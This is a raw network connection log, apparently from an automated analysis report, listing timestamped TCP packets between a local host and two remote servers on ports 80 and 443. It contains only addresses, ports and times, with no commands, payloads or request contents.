                        Nov 24, 2024 08:35:35.973479033 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.973536015 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.973599911 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.977535009 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.977658033 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.977718115 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.981448889 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.981544018 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.981604099 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.985511065 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.985615015 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.985677004 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.989437103 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.989509106 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.989586115 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.993473053 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.042932987 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.086972952 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.087160110 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.087255001 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.088696957 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.088747025 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.088927031 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.092194080 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.092302084 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.092510939 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.095659971 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.095769882 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.095854044 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.099215984 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.099350929 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.099415064 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.102549076 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.102646112 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.102724075 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.105815887 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.105971098 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.106069088 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.109034061 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.109173059 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.109258890 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.112154961 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.112267971 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.112323046 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.115207911 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.115340948 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.115411997 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.118222952 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.118304014 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.118355036 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.121198893 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.121309996 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.121396065 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.124187946 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.124223948 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.124325991 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.127190113 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.127223969 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.127311945 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.130641937 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.130692959 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.130759954 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.133183956 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.133258104 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.133327961 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.136164904 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.136251926 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.136343002 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.139157057 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.139266968 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.139334917 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.142128944 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.142240047 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.142419100 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.145159960 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.145253897 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.145334959 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.148119926 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.148180008 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.148247957 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.151103973 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.151206017 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.151303053 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.154192924 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.154253960 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.154366016 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.157044888 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.157089949 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.157164097 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.160079002 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.160192013 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.160365105 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.163052082 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.163147926 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.163278103 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.166316986 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.166388988 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.166466951 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.169187069 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.169226885 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.169282913 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.172013044 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.172130108 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.172264099 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.175029039 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.175061941 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.175136089 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.178183079 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.178194046 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.178260088 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.181066990 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.181173086 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.181242943 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.183978081 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.184112072 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.184175968 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.186968088 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.187028885 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.187114000 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.189944983 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.190078020 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.190129995 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.192956924 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.193001986 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.193084955 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.195995092 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.196108103 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.196186066 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.198956013 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.199018002 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.199150085 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.202114105 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.202224016 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.202290058 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.204931974 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.204967022 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.205044031 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.207920074 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.208043098 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.208218098 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.210973978 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.211041927 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.211102962 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.213887930 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.213990927 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.214070082 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.216897964 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.216969013 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.217077971 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.219860077 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.219963074 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.220036983 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.222871065 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.223006010 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.223078966 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.225908041 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.225986958 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.226074934 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.228849888 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.228971004 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.229079008 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.231842041 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.231966019 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.232091904 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.234823942 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.234915018 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.235002041 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.278712034 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.278793097 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.278866053 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.279870987 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.280042887 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.280111074 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.282721043 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.282804966 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.282893896 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.284706116 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.284893036 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.285001993 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.287081957 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.287201881 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.287273884 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.289532900 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.289701939 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.289830923 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.291870117 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.292139053 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.292207003 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.293926001 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.294158936 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.294224977 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.296112061 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.296164989 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.296251059 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.298338890 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.298449039 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.298516035 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.300539017 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.300565004 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.300638914 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.302582026 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.302694082 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.302789927 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.304672003 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.304704905 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.304816961 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.306729078 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.306878090 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.306957960 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.308777094 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.308914900 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.308994055 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.310800076 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.310911894 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.310970068 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.312850952 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.312911987 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.312964916 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.315002918 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.315088034 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.315175056 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.316736937 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.316824913 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.316936970 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.318667889 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.318778992 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.318840981 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.320617914 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.320728064 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.320784092 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.322499990 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.371038914 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.941148043 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:37.335572004 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:37.335638046 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:37.335817099 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:37.337500095 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:37.337524891 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:38.621197939 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:38.621321917 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.624461889 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.624476910 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:38.624780893 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:38.667902946 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.726686954 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.726711988 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:38.726885080 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.319413900 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.319519997 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.319581985 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.321774006 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.321794987 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.321825027 CET49705443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.321831942 CET44349705104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.478362083 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.478419065 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:39.478494883 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.479070902 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:39.479084969 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:40.735776901 CET44349706104.21.47.136192.168.2.5
                        Nov 24, 2024 08:35:40.735887051 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:40.737098932 CET49706443192.168.2.5104.21.47.136
                        Nov 24, 2024 08:35:40.737104893 CET44349706104.21.47.136192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 08:35:40.737351894 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:40.738504887 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:40.738528013 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:40.738578081 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.446508884 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.446561098 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.446592093 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.446636915 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.446666956 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.446669102 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.446693897 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.446710110 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.446749926 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.446753979 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.453954935 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.454032898 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.454056025 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.462239981 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.462311983 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.462328911 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.511814117 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.511854887 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.558650017 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.646991968 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.650772095 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.650897980 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.651012897 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.651014090 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.651096106 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.651114941 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.651130915 CET | 49706 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.651135921 CET | 443 | 49706 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.679567099 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.679626942 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:41.679836988 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.680099010 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:41.680115938 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:42.937397957 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:42.937474966 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:42.941329956 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:42.941345930 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:42.941582918 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:42.943396091 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:42.943532944 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:42.943561077 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:43.712161064 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:43.712253094 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:43.712497950 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:43.712636948 CET | 49707 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:43.712660074 CET | 443 | 49707 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:43.734525919 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:43.734579086 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:43.734649897 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:43.734941959 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:43.734955072 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:44.950825930 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:44.950948000 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:44.952591896 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:44.952608109 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:44.952853918 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:44.954399109 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:44.954554081 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:44.954582930 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:44.954669952 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:44.954678059 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:45.699394941 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:45.699497938 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:45.699661970 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:45.699717045 CET | 49708 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:45.699728012 CET | 443 | 49708 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:45.788099051 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:45.788144112 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:45.788233042 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:45.788530111 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:45.788539886 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:47.056437016 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
